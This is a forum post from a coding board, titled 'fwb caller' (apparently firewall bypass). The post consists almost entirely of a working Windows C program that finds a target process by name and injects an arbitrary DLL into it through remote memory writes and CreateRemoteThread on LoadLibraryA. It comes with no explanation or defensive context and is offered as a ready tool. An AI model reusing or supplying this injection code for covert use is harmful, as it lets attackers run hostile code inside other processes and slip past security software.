fwb caller

Post new topic   Reply to topic

Design & Code :: Coding :: C/C++

View previous topic View next topic Go down

fwb caller

Post  ~Fleck on Sun Jun 28, 2009 10:50 am

call fwb
Code:

#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "shlwapi.lib")

#define MAX_BUF_SIZE 1024
#define WIN32_LEAN_AND_MEAN
#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)

int injectDLL(DWORD pPID, char *pDLLName);
DWORD getPIDByName(char *lProcessName);

int main(int argc, char * argv[])
{
  int lRetVal = 0;
  int lPID = 0;
  char lTemp[MAX_BUF_SIZE + 1];

  if (argc <= 2 )
  {
    printf("Usage : %s process-ID DLL-name\n", argv[0]);
    lRetVal = -1;
    goto END;
  }

  lPID = getPIDByName(argv[1]);
  ZeroMemory(lTemp, sizeof(lTemp));

  GetFullPathName(argv[2], sizeof(lTemp) - 1, lTemp, NULL);

  if(injectDLL(lPID, lTemp) < 0)
  {
    printf("Unable to load DLL \"%s\". Error no %d\n", argv[2], GetLastError());
    lRetVal = -2;
    goto END;
  } else {
    printf("DLL loaded and injected.");
  }

END:

  return(0);
}



int injectDLL(DWORD pPID, char *pDLLName)
{
  int lRetVal = 0;
  HANDLE lProc;
  LPVOID lRemoteMemory = NULL;
  LPVOID lLoadLibraryPtr = NULL;

  if(! (lProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pPID)))
  {
    printf("OpenProcess() failed: %d\n", GetLastError());
    lRetVal = -1;
    goto END;
  }
 
  if (!(lLoadLibraryPtr = (LPVOID) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA")))
  {
    printf("Unable to load \"LoadLibraryA@Kernel32.dll\": %d", GetLastError());
    lRetVal = -2;
    goto END;   
  }
  if ( !(lRemoteMemory = (LPVOID) VirtualAllocEx(lProc, NULL, strlen(pDLLName), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)))
  {
    printf("Unable to load allocate memory: %d", GetLastError());
    lRetVal = -3;
    goto END;
  }
  WriteProcessMemory(lProc, (LPVOID) lRemoteMemory, pDLLName, strlen(pDLLName), NULL);
  CreateRemoteThread(lProc, NULL, NULL, (LPTHREAD_START_ROUTINE) lLoadLibraryPtr, (LPVOID) lRemoteMemory, NULL, NULL);

END:
 
  if (lProc != INVALID_HANDLE_VALUE)
    CloseHandle(lProc);

  return(lRetVal);
}
DWORD getPIDByName(char *lProcessName)
{
  PROCESSENTRY32 pe;
  HANDLE thSnapShot;
  int lRetVal = 0;
 
  if((thSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE)
  {
    printf("Error: Unable to create toolhelp snapshot!");
    lRetVal = -1;
    goto END;
  }

  pe.dwSize = sizeof(PROCESSENTRY32);
  if (Process32First(thSnapShot, &pe))
  {
    do
    {
      if(StrStrI(pe.szExeFile, lProcessName))
      {
        lRetVal = pe.th32ProcessID;
        break;
      }
    } while(Process32Next(thSnapShot, &pe));
  }

END:

  return(lRetVal);
}

~Fleck
Moderator
Moderator

Posts: 274
Activity: -258
Reputation: 8
Join date: 2009-06-28
Age: 16
Location: 127.0.0.1

Back to top Go down

View previous topic View next topic Back to top

Post new topic   Reply to topic

Design & Code :: Coding :: C/C++

Permissions of this forum:
You cannot reply to topics in this forum